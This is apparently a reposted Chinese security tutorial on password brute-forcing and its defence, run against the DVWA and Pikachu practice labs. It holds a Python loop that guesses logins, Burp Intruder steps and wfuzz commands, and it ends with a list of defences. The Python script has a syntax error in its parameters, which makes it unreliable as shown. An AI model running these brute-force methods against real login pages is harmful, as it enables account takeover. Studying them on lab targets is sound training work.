密码暴力破解与防御

admin 2024年10月10日21:18:39评论12 views字数 1714阅读5分42秒阅读模式

密码安全概述

加密、完整性、身份认证

存储安全、传输安全、输入安全

漏洞利用

从数据库获取密码

窃听通信数据

直接从登录框猜测数据

权限管理

认证:你是谁?

授权:你能做什么?

不安全的密码

默认密码

000000

123456

空密码

身份证后六位

手机后六位

弱口令

裤子

已经泄漏的密码

密码猜解思路

猜测范围

密码长度

密码内容

APP密码范围

字典

kali字典存放路径

密码暴力破解与防御

专门字典

【1】指定格式的字典,比如生日、手机号、QQ号 crunch -h

密码暴力破解与防御

【2】社工字典

cupp、ccupp

【3】文章内容字典

cewl https://sqlmap.org -w dict.txt

python暴力破解

从字典取其值,生成密码

# -*- coding: utf-8 -*-
# python 3

pwds = open("password.txt")
for pwd in pwds:
    print(pwd)

pwds.close()

HTTP连接到需要爆破的地址

# -*- coding: utf-8 -*-
# python 3

import requests
# 如果第一个密码就提示成功,是 PHPSESSID 没有替换的问题
pwds = open("password.txt")
for pwd in pwds:
    url = "http://localhost/dvwa/vulnerabilities/brute/"
    # PHPSESSID务必替换为登录以后的PHPSESSID
    resp = requests.get(url = url, params = {"username":"admin""password":pwd.strip(), "Login":"Login"}, headers = {"Cookie":"security=low; PHPSESSID=sm7bdfe4r6c03ai9682timdlu1"})
    #print(resp.text)
    if 'Username and/or password incorrect.' in resp.text:
        print('破解失败:'+pwd, end='')
    else:
        print('破解成功:'+pwd, end='')
        break;
pwds.close()
密码暴力破解与防御

安装requests

密码暴力破解与防御

获得HTTP响应,分析响应结果,看看有没有错误提示

如果有提示,就继续下一次循环

如果没有,就继续下一次循环

密码暴力破解与防御

Burp Suite暴力破解

Low

设置好代理

密码暴力破解与防御

抓包成功

使用intruder模式

密码暴力破解与防御

选择模式,选择攻击的字段

密码暴力破解与防御

导入密码字典

密码暴力破解与防御

开始攻击

密码暴力破解与防御

攻击完成,单击排序

密码暴力破解与防御

查看length最长即为密码

密码暴力破解与防御

Medium

做了一个延迟,影响很小

High

抓包

密码暴力破解与防御

设置intruder

密码暴力破解与防御
密码暴力破解与防御
密码暴力破解与防御
密码暴力破解与防御
密码暴力破解与防御
密码暴力破解与防御
密码暴力破解与防御
密码暴力破解与防御
密码暴力破解与防御
密码暴力破解与防御
密码暴力破解与防御
密码暴力破解与防御

Bp其他攻击模式

密码暴力破解与防御

攻城锤:所有字段都一样

草叉:可以选择两个字段,并分别设置字典

榴霰弹:两个字典可以交叉匹配

Impossible

限制猜解的时间和次数

密码暴力破解与防御

如何防御暴力破解

【1】 二次验证

【2】限制次数,锁定账户

【3】WAF

【4】IP验证

【5】行为识别,异地登录

【6】强制修改密码

【7】取消密码注册

其他暴力破解工具

wfuzz

密码暴力破解与防御

piachu

密码暴力破解与防御

wfuzz -z file,user -z file,pass -d “username=FUZZ&password=FUZ2Z&submit=login” http://192.168.202.139/pikachu/vul/burteforce/bf_form.php

密码暴力破解与防御

wfuzz -z file,user -z file,pass --hw 1797 -d “username=FUZZ&password=FUZ2Z&submit=login” http://192.168.202.139/pikachu/vul/burteforce/bf_form.php

密码暴力破解与防御

Hydra

密码暴力破解与防御
密码暴力破解与防御
密码暴力破解与防御
密码暴力破解与防御
密码暴力破解与防御

Mudusa

密码暴力破解与防御
密码暴力破解与防御

MSF

密码暴力破解与防御

最后,别忘了点赞哈~

密码暴力破解与防御
文章来源blog.csdn.net/m0_57379855?type=blog
如有侵权请联系删除

密码暴力破解与防御

密码暴力破解与防御

● Nmap使用教程图文教程(超详细)

● 我是网管,领导让我学安全,拼了!

密码暴力破解与防御

原文始发于微信公众号(网络安全资源库):密码暴力破解与防御

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月10日21:18:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   密码暴力破解与防御http://cn-sec.com/archives/1928519.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息